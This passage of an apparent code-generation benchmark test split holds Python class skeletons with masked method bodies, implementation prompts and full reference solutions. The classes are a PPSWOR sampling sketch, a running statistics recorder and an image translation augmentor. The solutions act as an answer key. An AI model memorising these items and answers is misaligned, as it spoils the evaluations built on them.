self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "class_docstring": "A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.", "class_name": "PpsworSketch", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. 
Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000372", "length_bytes": 24996, "license_type": "permissive", "methods": [{"docstring": "Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.", "name": "__init__", "signature": "def __init__(self, k, p, sample_p=1)"}, {"docstring": "Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)", "name": "process", "signature": "def process(self, key, value)"}, {"docstring": "Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).", "name": "_remove_additional_elements", "signature": "def _remove_additional_elements(self)"}, {"docstring": "Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment", "name": "estimate_moment", "signature": "def estimate_moment(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000298", "prompt": "Implement the Python class `PpsworSketch` described below.\n\nClass description:\nA simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\n\nMethod signatures and docstrings:\n- def __init__(self, k, p, sample_p=1): Initializes an empty sketch/sample of specified size. 
Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\n- def process(self, key, value): Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\n- def _remove_additional_elements(self): Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\n- def estimate_moment(self): Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment", "prompted_full_text": "Implement the Python class `PpsworSketch` described below.\n\nClass description:\nA simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\n\nMethod signatures and docstrings:\n- def __init__(self, k, p, sample_p=1): Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\n- def process(self, key, value): Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\n- def _remove_additional_elements(self): Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\n- def estimate_moment(self): Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\n\n<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. 
Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n<|end_body_3|>\n", "revision_id": "727ec399ad17b4dd1f71ce69a26fc3b0371d9fa7", "skeleton": "<|skeleton|>\nclass PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n <|body_0|>\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n <|body_1|>\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. 
Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n <|body_2|>\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. Returns: The estimate of the p-th frequency moment\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PpsworSketch:\n \"\"\"A simple implementation of PPSWOR sampling for aggregated data. Used as a benchmark for estimating moments with advice. The sketch assumes input that consists of (key, value) pairs, which is aggregated (each key appears at most once, no guarantees on the output otherwise). The sketch supports sampling keys with weight that are any power of their value. The sample can then be used to estimate frequency moments.\"\"\"\n\n def __init__(self, k, p, sample_p=1):\n \"\"\"Initializes an empty sketch/sample of specified size. Args: k: Sample size p: The moment estimated by the sketch sample_p: The power of values used for the sampling weights, that is, the weight used for sampling an element (key, value) is going to be value ** sample_p.\"\"\"\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n\n def process(self, key, value):\n \"\"\"Processes a weighted element by the sample. Args: key: The key of the element value: The value (weight) of the element Raises: Exception: Raised when seeing a key that is already in the sample (since we assume the data is aggregated, i.e., each key appears only once)\"\"\"\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n\n def _remove_additional_elements(self):\n \"\"\"Removes any elements in the sample beyond the k lowest elements. Used as part of an optimization that removes excessive elements only once the sample reached size greater than 2k (instead of k).\"\"\"\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n\n def estimate_moment(self):\n \"\"\"Estimates the p-th frequency moments of the elements processed so far. p is passed as a parameter to the constructor. 
Returns: The estimate of the p-th frequency moment\"\"\"\n if len(self.elements) > self.k:\n self._remove_additional_elements()\n max_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\n threshold = max_in_sample[1][0]\n sum_estimator = 0.0\n for key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\n return sum_estimator\n", "source": "the_stack_v2_python_sparse", "source_path": "moment_advice/moment_advice.py", "source_repo": "Ayoob7/google-research", "split": "test", "star_events_count": 2} {"blob_id": "dc8908acbe8419473fc88fe51b25882824298413", "bodies": ["if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\nelse:\n self.nobservations = 0", "if self.nobservations == 0:\n self.__init__(data)\nelse:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n"], "bodies_text": "<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "class_docstring": "", "class_name": "StatsRecorder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = 
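Usage note on the PpsworSketch record above: drawing seed ~ Exponential(rate = value ** sample_p) and keeping the k smallest seeds is the bottom-k formulation of PPSWOR, and estimate_moment inverts each kept key's conditional inclusion probability 1 - exp(-weight * threshold). A toy run against an exact moment, assuming the class definition above plus numpy imported as np; the printed estimate fluctuates around the exact value with the RNG seed:

import numpy as np

np.random.seed(0)
data = {f'key{i}': i + 1 for i in range(100)}   # aggregated (key, value) pairs
exact = sum(v ** 2 for v in data.values())      # exact 2nd moment: 338350

sketch = PpsworSketch(k=30, p=2)                # estimate sum(v**2) from a 30-key sample
for key, value in data.items():
    sketch.process(key, value)

print(exact, round(sketch.estimate_moment(), 1))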
data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000373", "length_bytes": 13008, "license_type": "no_license", "methods": [{"docstring": "data: ndarray, shape (nobservations, ndimensions)", "name": "__init__", "signature": "def __init__(self, data=None)"}, {"docstring": "data: ndarray, shape (nobservations, ndimensions)", "name": "update", "signature": "def update(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `StatsRecorder` described below.\n\nClass description:\nImplement the StatsRecorder class.\n\nMethod signatures and docstrings:\n- def __init__(self, data=None): data: ndarray, shape (nobservations, ndimensions)\n- def update(self, data): data: ndarray, shape (nobservations, ndimensions)", "prompted_full_text": "Implement the Python class `StatsRecorder` described below.\n\nClass description:\nImplement the StatsRecorder class.\n\nMethod signatures and docstrings:\n- def __init__(self, data=None): data: ndarray, shape (nobservations, ndimensions)\n- def update(self, data): data: ndarray, shape (nobservations, ndimensions)\n\n<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n<|end_body_1|>\n", "revision_id": "28a59f3182f0ba58ba582449377c6588af1d4cde", "skeleton": "<|skeleton|>\nclass StatsRecorder:\n\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_0|>\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StatsRecorder:\n def __init__(self, data=None):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n if data is not None:\n data = np.transpose(np.atleast_2d(data))\n self.mean = data.mean(axis=0)\n self.std = data.std(axis=0)\n self.nobservations = data.shape[0]\n self.ndimensions = data.shape[1]\n else:\n self.nobservations = 0\n\n def update(self, data):\n \"\"\"data: ndarray, shape (nobservations, ndimensions)\"\"\"\n if self.nobservations == 0:\n self.__init__(data)\n else:\n data = np.transpose(np.atleast_2d(data))\n 
if data.shape[1] != self.ndimensions:\n raise ValueError(\"Data dims don't match prev observations.\")\n newmean = data.mean(axis=0)\n newstd = data.std(axis=0)\n m = self.nobservations * 1.0\n n = data.shape[0]\n tmp = self.mean\n self.mean = m / (m + n) * tmp + n / (m + n) * newmean\n self.std = m / (m + n) * self.std ** 2 + n / (m + n) * newstd ** 2 + m * n / (m + n) ** 2 * (tmp - newmean) ** 2\n self.std = np.sqrt(self.std)\n self.nobservations += n\n", "source": "the_stack_v2_python_sparse", "source_path": "]tasks/2018.11.06.domain_baselines/dtda_gaussian_recorder.py", "source_repo": "bohaohuang/sis", "split": "test", "star_events_count": 2} {"blob_id": "7ba258f58991cac4ff68f21670e74127361cda2f", "bodies": ["self.offset = offset\nself.p = p\nself.down_scale = 1", "num_examples = len(data[0])\nfor i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\nreturn data", "region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\npadding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\nregion = np.pad(region, padding, 'reflect')\nreturn region", "new_image = dont_cares * np.ones_like(label)\nnew_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\nreturn new_image"], "bodies_text": "<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "class_docstring": "Augments the images by translating the content and applying reflection padding.", "class_name": "TranslationAugmentor", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. 
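The StatsRecorder update above is the standard pairwise combination of running statistics: with m and n observations, mean' = (m*mu1 + n*mu2)/(m+n) and var' = m/(m+n)*var1 + n/(m+n)*var2 + m*n/(m+n)**2 * (mu1 - mu2)**2, which merges two population variances exactly. Note the np.atleast_2d plus transpose step turns a plain 1-D array of n scalar observations into shape (n, 1), so 1-D streams are the safe input form. A quick numerical check, assuming numpy imported as np and the class above:

import numpy as np

np.random.seed(1)
a = np.random.randn(500)
b = np.random.randn(200) + 2.0

rec = StatsRecorder(a)   # first batch
rec.update(b)            # merged incrementally

full = np.concatenate([a, b])
assert np.isclose(rec.mean[0], full.mean())
assert np.isclose(rec.std[0], full.std())    # population std, ddof=0
assert rec.nobservations == 700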
:param p: The probability that this will be applied.\"\"\"\n <|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000374", "length_bytes": 5227, "license_type": "no_license", "methods": [{"docstring": "Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.", "name": "__init__", "signature": "def __init__(self, offset=40, p=1)"}, {"docstring": "Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:", "name": "augment", "signature": "def augment(self, data)"}, {"docstring": "Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.", "name": "embed_image", "signature": "def embed_image(self, image, offset)"}, {"docstring": "Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.", "name": "embed_labels", "signature": "def embed_labels(self, label, offset, dont_cares=-1)"}], "n_methods": 4, "prompt": "Implement the Python class `TranslationAugmentor` described below.\n\nClass description:\nAugments the images by translating the content and applying reflection padding.\n\nMethod signatures and docstrings:\n- def __init__(self, offset=40, p=1): Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. 
:param p: The probability that this will be applied.\n- def augment(self, data): Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\n- def embed_image(self, image, offset): Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\n- def embed_labels(self, label, offset, dont_cares=-1): Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.", "prompted_full_text": "Implement the Python class `TranslationAugmentor` described below.\n\nClass description:\nAugments the images by translating the content and applying reflection padding.\n\nMethod signatures and docstrings:\n- def __init__(self, offset=40, p=1): Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\n- def augment(self, data): Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\n- def embed_image(self, image, offset): Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\n- def embed_labels(self, label, offset, dont_cares=-1): Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. :return: The augmented label image.\n\n<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n <|body_0|>\n\n def augment(self, data):\n \"\"\"Augments the images by translating the content and applying reflection padding. :param data: An array of two elements (images, targets) :return:\"\"\"\n <|body_1|>\n\n def embed_image(self, image, offset):\n \"\"\"Embeds the image and performs reflection padding. :param image: The image to translate. :param offset: The offset by which we translate. :return: The augmented image.\"\"\"\n <|body_2|>\n\n def embed_labels(self, label, offset, dont_cares=-1):\n \"\"\"Embeds the labels in a -1 map. :param label: The label image. :param offset: The offset by which we translate the image. 
:return: The augmented label image.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.offset = offset\n self.p = p\n self.down_scale = 1\n<|end_body_0|>\n\n<|body_start_1|>\n num_examples = len(data[0])\n for i in range(num_examples):\n if np.random.uniform(0, 1) > self.p:\n continue\n offset = [self.down_scale * np.random.randint(-self.offset, self.offset + 1) for l in range(2)]\n data[0][i] = self.embed_image(data[0][i], offset)\n for j in range(1, len(data)):\n data[j][i] = self.embed_labels(data[j][i], offset)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n region = image[:, max(-offset[0], 0):image.shape[1] - max(0, offset[0]), max(-offset[1], 0):image.shape[2] - max(0, offset[1])]\n padding = ((0, 0), (max(0, offset[0]), max(0, -offset[0])), (max(0, offset[1]), max(0, -offset[1])))\n region = np.pad(region, padding, 'reflect')\n return region\n<|end_body_2|>\n\n<|body_start_3|>\n new_image = dont_cares * np.ones_like(label)\n new_image[max(0, offset[0]):label.shape[0] + min(0, offset[0]), max(0, offset[1]):label.shape[1] + min(0, offset[1])] = label[max(-offset[0], 0):label.shape[0] - max(0, offset[0]), max(-offset[1], 0):label.shape[1] - max(0, offset[1])]\n return new_image\n<|end_body_3|>\n", "revision_id": "d494b3041069d377d6a7a9c296a14334f2fa5acc", "skeleton": "<|skeleton|>\nclass TranslationAugmentor:\n \"\"\"Augments the images by translating the content and applying reflection padding.\"\"\"\n\n def __init__(self, offset=40, p=1):\n \"\"\"Initializes a new instance of the TranslationAugmentor class. :param offset: The offset by which the image is randomly translated. :param p: The probability that this will be applied.\"\"\"\n 